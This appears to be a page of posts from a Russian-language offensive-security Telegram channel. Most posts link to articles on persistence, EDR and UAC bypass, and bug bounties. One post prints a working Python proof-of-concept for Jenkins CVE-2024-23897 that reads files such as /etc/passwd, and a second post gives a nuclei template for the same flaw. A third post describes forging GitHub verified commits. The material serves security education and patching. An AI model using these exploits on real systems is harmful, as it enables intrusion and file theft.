Похек
16.4K subscribers
2.08K photos
110 videos
243 files
3.06K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @PoxekAds_bot или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
А сейчас я угадайте где?)
Ответ вполне очевиден 🌚

🧲 На удивление людно, причем без мероприятия, как я понимаю

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
3
🐧 The Art Of Linux Persistence

Иногда делая пробив Linux сервера, то нельзя точно гарантировать "выкинет" ли тебя админ с захваченной машины. Иногда это вопрос не Если?, а Когда?. Но всегда нужно выполнять такой этап атаки, как закрепление. Это даст вам не только стабильную для точно входа во внутрь, но и потенциально сделает подключение более удобным. Для такого случая я нашёл для вас статью по закреплению в Linux.

➡️ Читать далее

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥54
📺 XSS and CORS Bypass in YouTube

Вы когда-нибудь хотели взломать Google? Я вот да, естественно в этических целях, к примеру бб. Можно вспомнить кучу историй, когда малолетние багхантеры находили незащищенные "ручки" в сервисах 🖥. Но вот вы попробуйте обойти CORS, чтобы выполнить XSS 🌚

Статья как раз об этом, как вы могли догадаться по названию)

➡️ Читать далее

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
12🔥41🌚1
Forwarded from SHADOW:Group
💰Как предложение от банка привело к раскрытию личных данных и награде в 5000$

Небольшой рассказ о том, как обычное почтовое предложение позволяло злоумышленнику получить доступ к данным других пользователей и раскрыть конфиденциальную личную информацию.

Ссылка на статью

#web #idor #leak
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥131
⚔️ EDR Evasion Techniques Using Syscalls

Мне так понравилось тема обхода СЗИ, что вот приходится продолжать делать посты про это, так ещё и вам это нравится. Такой метч даже в Tinder не бывает))
Эта статья основана на байпассе EDR с помощью syscalls. Да-да, ещё не средства защиты умеют обнаруживать атаки с помощью syscalls.

➡️ Читать далее

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥83
Forwarded from Похек meme
🔥29🥰2🐳2🌚1👾1
Forwarded from Заметки Слонсера (Slonser)
История одной уязвимости в Chrome

Очень простая уязвимость, которую я нашел в Google Chrome. И за которую получил 16000$.
Попытался дать побольше контекста, чтобы увеличить пользу от прочтения материала.
Habr
Twitter
P.S. Лучшей благодарностью, если вам понравился материал - является его распространение.
🔥1441
💻 User Account Control/Uncontrol: Mastering the Art of Bypassing Windows UAC

На фоне того, что знать Windows уже недостаточно для пентеста при проектах по внутрянке, следует изучить различные байпассы. Самыми простым примером будет UAC Bypass, который на удивление легко спрятать от AV. Но с развитием СЗИ и появлением (но не распространением) всяких EDR/XDR/и т.д. приходится более изощренно подходить к процессу анализа защищенности.

Как отметил в своём проекте, у некоторых специалистов вырабатывается скитлстрянка байпассотрянка. Когда видишь новый способ байпасса, но не у компа, а протестить на текущем проекте уже хочется))

⚡️ Поэтому советую вам прочитать эту статью и ждать кое что от меня и ещё пары авторов 😉

➡️ Читать далее

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
6❤‍🔥2👾2
Jenkins RCE Arbitrary File Read CVE-2024-23897

Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j. Эта функция включена по умолчанию, и в Jenkins 2.441 и более ранних версиях, LTS 2.426.2 и более ранних версиях она не отключается.

PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys

if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()

data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())

print(f'REQ: {data_bytes}\n')

def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')

def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)

t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)

t1.start()
time.sleep(0.1)
t2.start()

t1.join()
t2.join()


Использование:
python poc.py http://127.0.0.1:8888/ [/etc/passwd]


Обновление:
Обновление до Jenkins 2.442, LTS 2.426.3

Патч:
Если вы не можете обновиться до последней версии, то отключите доступ к CLI, это должно полностью исключить возможность эксплуатации.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥172
Похек
Jenkins RCE Arbitrary File Read CVE-2024-23897 Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j. Эта функция включена по умолчанию, и в Jenkins 2.441 и более ранних версиях, LTS 2.426.2 и более ранних…
Jenkins nuclei-template
RCE Arbitrary File Read CVE-2024-23897

Пока официально не добавили в nuclei-template. Я не проверял ещё. Не на чем 😢

id: CVE-2024-23897

info:
name: Jenkins < 2.441 - Arbitrary File Read
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
reference:
- https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314
tags: cve,cve2024,lfi,rce,jenkins

variables:
payload: "{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}"

javascript:
- code: |
let m = require('nuclei/net');
let name=(Host.includes(':') ? Host : Host+":80");
let conn,conn2;
try { conn = m.OpenTLS('tcp', name) } catch { conn= m.Open('tcp', name)}
conn.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: download\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n');
try { conn2 = m.OpenTLS('tcp', name) } catch { conn2= m.Open('tcp', name)}
conn2.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nContent-type: application/octet-stream\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: upload\r\nConnection: keep-alive\r\nContent-Length: 163\r\n\r\n'+Body)
resp = conn.RecvString(1000)
args:
Body: "{{payload}}"
Host: "{{Hostname}}"

matchers:
- type: dsl
dsl:
- 'contains(response, "No such agent \"")'


🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
😥 The Art Of Hiding In Windows

Что сказать вам? Заключающая статья по играм с Windows на этой неделе, но не последняя на канале 😏
В статье будут раскрыты такие направления, как Сокрытие процессов, Core компоненты, Core механики, а также API Hooking.
Предположу, что для прожжённых самоварчиков это будет БАЗА, но для остальных более чем зайдет)

➡️ Читать далее

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥81
Коллеги, сегодняшний день объявляем днем официальной смены названия нашего Клуба Траектория роста 💪

Теперь новое название Клуба - ЗУБРЫ Кибербеза.

На наш взгляд, оно отлично отражает суть того, что происходит внутри Клуба. А именно реализация миссии Клуба - помогать становиться дорогими и востребованными профессионалами по кибербезопасности, т.е. настоящими зубрами кибербеза.

Сейчас Клуб ориентирован на 3 аудитории:
👨 Студенты и совсем начинающие специалисты в ИБ, которые в Клубе могут набраться новых знаний и навыков
👨‍🦱 Действующие специалисты по ИБ, которые в Клубе могут увидеть свои сильные профессиональные и личностные стороны, простроить свой карьерный трек и открыть для себя возможность занимать более интересные и высокооплачиваемые позиции
🧔‍♂️ Руководители по ИБ, которые в Клубе смогут усилить свои управленческие компетенции и взять форматы, реализованные в Клубе, к использованию внутри своих команд

Сейчас к Клубу присоединился партнер - Сергей Зыбнев, с которым у нас грандиозные планы по развитию Клуба.

И уже сегодня всех ждем на пятничной встрече в 18.00 мск, где мы познакомимся с Сергеем и приоткроем наши планы на 2024 год, а заодно спросим вас, чего вы ждете от Клуба/

Сегодняшнюю встречу сделаем открытой, поэтому встретимся на онлайн-трансляции в нашем канале Код ИБ.

Заглядывайте на огонек и присоединяйтесь к Клубу 👋
🐳7🌚33
Forwarded from Cybred
Подделка подписей на Github

Перед тем, как что-нибудь закоммитить в репозиторий, git просит пользователя указать имя и email. Если сделать так
git config --global user.name "Linus Torvalds"
git config --global user.email "torvalds@linux-foundation.org"

Github подхватит почту и будет помечать твои коммиты, как будто их на самом деле сделал Линус, — с его именем, аватаркой и ссылкой на профиль https://github.com/torvalds.

Так может сделать любой, и поэтому существует зеленая надпись "Verified" напротив коммитов, подписанных с помощью GPG.

Если отправить что-нибудь через веб, коммит подпишется от имени GitHub <noreply@github.com> и тоже будет считаться верифицированным.

Для этого сырой блоб отправляется на внутренний эндпоинт https://api.github.com/vscs_internal/commit/sign, где его подхватывает gh-gpgsign и возвращает подписанный результат.

На бэкенде проверяется условие, что строка автора из коммита, полученная с помощью регулярки /\Aauthor (.+?) <(.+)>/, должны быть равна имени текущего залогиненного пользователя.

Но имя может быть пустым, тогда коммит будет таким
author  <583231+octocat@users.noreply.github.com> 1682188800 +0000
author username <user@example.com> 1682188800 +0000

где первая строка — сгенерирована автоматически,
а вторая — фейковая, уже отправленная нами.

Первая не подойдет под регулярку, поэтому будет взята вторая, которую мы контролируем. И так мы можем получить галочку "Verified" на коммит с именем Торвальдса без его подписи, или с любым другим именем.

Автору заплатили $10.000. Баг удалось найти в Codespaces, благодаря реверсу GitHub Enterprise Server Trial VM.
🔥61
'OR 1'='1

Что-то у меня за новогодние праздники подкопилось очень много полезной информации для коллег по цеху, поэтому всем остальным на этой неделе придется еще раз задержать дыхание и немного потерпеть.

В одном из прошлых своих постов я упоминал (это было тут, в контексте премии пентестеров), что изучение отчетов/репортов достаточно сильно расширяет мышление тех, кто трудится в Blue Team и углубляет их познания в специфике Red Team. Так вот, мнение своё я еще не поменял, поэтому всем безопасникам всё также советую почитывать что-то подобное, чтобы быть в курсе актуальных методов эксплуатации уязвимостей, того, как мыслит атакующий и что уже было "пробито".

Собственно, делюсь с вами очень крутым репозиторием в GitHub (ну а где еще), где собраны и регулярно обновляются подборки с теми самыми репортами от этичных хакеров. Авторы заботливо всё отсортировали по типам уязвимостей и даже по отдельным баг-баунти программам различных компаний. Так что вэлкам – сохраняем и распространяем. Можете даже взять себе за привычку регулярно что-то оттуда почитывать по несколько отчётов в день/неделю.

#Полезное

Твой Пакет Безопасности
124🔥32❤‍🔥1🤩1
Forwarded from true_security
Аналог sharphound и других сборщиков для bloodhound (и не только), но собирает информацию по протоколу Active Directory Web Services (ADWS) через SOAP запросы.
Впринципе, детекты по LDAP запросам (NTA, SIEM правила и другие детекты аномалий) отвалились(да, но нет))).
https://github.com/FalconForceTeam/SOAPHound

P.S. на контроллерах домена должен быть открыт tcp порт 9389
❤‍🔥1
1' Мерч, мерч, мерч --

Сейчас компании во время мероприятий чего только не делают в виде мерча с рекламой своих мероприятий. От верхней одежды до практически штанов и трусов. Но надо ли нам это? И да, и нет. Эту проблему подчеркнул у себя Алексей Лукацкий. Понятно что с его опытом посещения мероприятий по всему миру уже сложно чем-то удивить.

А если спуститься на наш, более человечный уровень. То что бы радовало ваш глаз в контекста мерча? Тонкая подводка, не правда ли?) Ещё с прошлого года корпел над идей своего мерча, который в будущем станет неким брендом в ИБ комьюнити. Уже сделали первую идею мерча, которую можно охарактеризовать, как: "Это было пиздец, как смело" )).

Напишите свои идеи по поводу мерча, можно в чат, можно в ЛС @szybnev. Все идеи приветствуются. Если есть реальный пример или просто референс с мероприятий, тем более делитесь. Сделаем мерч под желания комьюнити!

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤‍🔥2
A Practical Guide to PrintNightmare in 2024
#windows

Хотя теоретически проблема PrintNightmare и ее разновидностей была решена корпорацией Microsoft, она продолжает влиять на организации до сих пор, в основном из-за довольно запутанных групповых политик и настроек. В этой статье автор хочет пролить свет на эти проблемы с настройками и дать четкое руководство по их устранению.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
5